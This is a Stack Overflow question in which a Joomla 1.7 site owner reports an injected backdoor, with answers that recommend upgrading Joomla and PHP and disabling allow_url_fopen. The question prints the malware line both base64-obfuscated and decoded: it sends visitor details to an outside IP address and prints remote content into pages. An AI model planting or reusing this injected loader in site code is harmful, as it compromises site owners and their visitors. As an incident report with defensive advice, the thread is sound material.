Site backdoor & eval() [closed]

Question

Closed. This question is off-topic. It is not currently accepting answers.

---

Want to improve this question? Update the question so it's on-topic for Stack Overflow.

Closed 9 years ago.

Improve this question

I'm running a Joomla 1.7 site which was hacked today. Below script did the hack.

eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pIC4gJyZyZXE9JyAuIEB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddIC4gJy8nIC4gJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pKTsNCg0K")));

Above line was injected to my index.php file of the templates folder. Every template which was in the folder had the above code. In each file it was repeated few times.

When I decode the code, it outputs

print @file_get_contents('http://93.115.86.168/hlinks/links.php?ua=' . @urlencode($_SERVER['HTTP_USER_AGENT']) . '&req=' . @urlencode($_SERVER['HTTP_HOST'] . '/' . $_SERVER['REQUEST_URI'])); 

I removed the script and site happens to work fine. Script didn't do anything bad except site did not load at all.

My problem is even when I have set the file permission to 644 and folder permission to 755, How could this happen?

How can I figure out what caused the problem? What steps should I take to prevent happening this in the future?

UPDATE

This Forum Post Assistant / FPA is very helpful

Answer 1

How about because your running a Joomla 1.7 site? Joomla 1.7 is no longer supported and several security fixes have been added into Joomla since it was released. You should immediately upgrade to 2.5.9. There should be no backwards compatability issues as 2.5.9 is just the Long Term Supported Release of Joomla 1.7.

Check your PHP settings are as advised in the Joomla Security Checklist here. Make sure you PHP and MYSQL versions are reasonably up to date (at least PHP 5.3.x - preferably 5.4.x and MYSQL at least 5.0.4).

Finally make sure all your extensions are up to date. Again developers constantly update modules not just to add new features but also to add in extra/improved security or to protect against found vulnerabilities!

Also please not turning on allow_url_fopen like Steven says will result in Joomla's One-Click-Update to stop working properly.

Answer 2

It is not reading a file from your file system, but rather reading directly from an external URL. You can disable reading from any external URL in php via the php.ini setting:

allow_url_fopen = 0

Answer 3

It's not possible from what you've told us to pinpoint the cause of the hack, but the most likely reason (almost certain) is that you're running old versions of some software, which have known security holes that the hacker was able to attack.

• Check your version of PHP: If it's anything lower than v5.3.21 or v5.4.11 (ie the current versions) you probably have security holes. If it's v5.2 or lower then it is definitely vulnerable (5.2 hasn't been supported for two years now). If your hosting provider is not up-to-date with their PHP version, then you need to hassle them to fix it. If they won't fix it, you need to find a better host.

• Check your version of joomla: is it up-to-date? You mention it's v1.7: This is not up to date 1.7 was released a year and half ago. Current versions are 2.5 and 3.0. That means you almost certainly have security holes in it, which means you can be hacked. Upgrading from 1.7 to 2.5 may be painful, but if you want to be secure, you must do it.

Keeping your software up to date is one of the most important things you can do on a website to keep it secure. It's not optional: If you want to avoid being hacked, you need to keep up to date, and you need to be keeping an eye on new releases constantly -- new security holes are found all the time. Generally most good quality software is fixed fairly quickly when a new bug comes to light, but it's your responsibility to install the fixed version on your server, otherwise the bug will still be there and will likely be hacked.

There are other ways you could have been hacked; lets not discount them; most of them are outside your control. Keeping your software versions updated is your number one best defense.